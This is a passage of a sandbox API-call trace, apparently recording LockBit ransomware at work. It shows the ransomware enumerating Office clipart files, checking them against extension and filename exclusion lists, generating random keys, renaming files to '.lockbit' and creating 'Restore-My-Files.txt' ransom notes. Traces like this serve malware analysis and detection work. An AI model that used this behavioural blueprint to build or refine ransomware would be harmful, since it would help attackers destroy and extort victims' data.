returned -1 [0139.564] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.564] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.564] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.564] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF.lockbit") returned 72 [0139.564] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.565] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.565] malloc (_Size=0x40068) returned 0x3df0008 [0139.565] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22300) returned 1 [0139.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.566] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.569] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.569] malloc (_Size=0xa6) returned 0x77d7a8 [0139.569] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.572] free (_Block=0x77d7a8) [0139.572] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.572] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.572] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x614c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107158.WMF", cAlternateFileName="")) returned 1 [0139.572] lstrcmpiW (lpString1=".", lpString2="J0107158.WMF") returned -1 [0139.572] lstrcmpiW (lpString1="..", lpString2="J0107158.WMF") returned -1 [0139.572] PathFindExtensionW (pszPath="J0107158.WMF") returned=".WMF" [0139.572] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.572] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.573] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.573] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107158.WMF") returned 1 [0139.574] lstrcmpiW (lpString1="ntldr", lpString2="J0107158.WMF") returned 1 [0139.574] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107158.WMF") returned 1 [0139.574] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107158.WMF") returned -1 [0139.574] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107158.WMF") returned -1 [0139.574] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107158.WMF") returned 1 [0139.574] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107158.WMF") returned -1 [0139.574] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.574] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned=".WMF" [0139.574] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.574] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.575] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.575] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.575] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF.lockbit") returned 72 [0139.576] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.577] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.577] malloc (_Size=0x40068) returned 0x3df0008 [0139.577] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24908) returned 1 [0139.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.579] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.584] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.584] malloc (_Size=0xa6) returned 0x77d7a8 [0139.584] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.587] free (_Block=0x77d7a8) [0139.587] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.587] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.587] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.587] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3ee4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107182.WMF", cAlternateFileName="")) returned 1 [0139.587] lstrcmpiW (lpString1=".", lpString2="J0107182.WMF") returned -1 [0139.587] lstrcmpiW (lpString1="..", lpString2="J0107182.WMF") returned -1 [0139.587] PathFindExtensionW (pszPath="J0107182.WMF") returned=".WMF" [0139.587] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.587] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.587] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.587] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.587] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.587] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.587] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.587] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.587] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.587] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.588] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.588] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107182.WMF") returned 1 [0139.589] lstrcmpiW (lpString1="ntldr", lpString2="J0107182.WMF") returned 1 [0139.589] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107182.WMF") returned 1 [0139.589] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107182.WMF") returned -1 [0139.589] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107182.WMF") returned -1 [0139.589] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107182.WMF") returned 1 [0139.589] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107182.WMF") returned -1 [0139.589] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.589] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned=".WMF" [0139.589] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.589] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.589] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.590] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.590] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF.lockbit") returned 72 [0139.590] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107182.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.591] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.591] malloc (_Size=0x40068) returned 0x3df0008 [0139.592] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16100) returned 1 [0139.592] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.592] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.592] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.593] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.650] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.650] malloc (_Size=0xa6) returned 0x77d7a8 [0139.650] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.771] free (_Block=0x77d7a8) [0139.771] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.771] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.771] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.771] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x11b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107188.WMF", cAlternateFileName="")) returned 1 [0139.771] lstrcmpiW (lpString1=".", lpString2="J0107188.WMF") returned -1 [0139.771] lstrcmpiW (lpString1="..", lpString2="J0107188.WMF") returned -1 [0139.771] PathFindExtensionW (pszPath="J0107188.WMF") returned=".WMF" [0139.771] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.771] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.772] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned 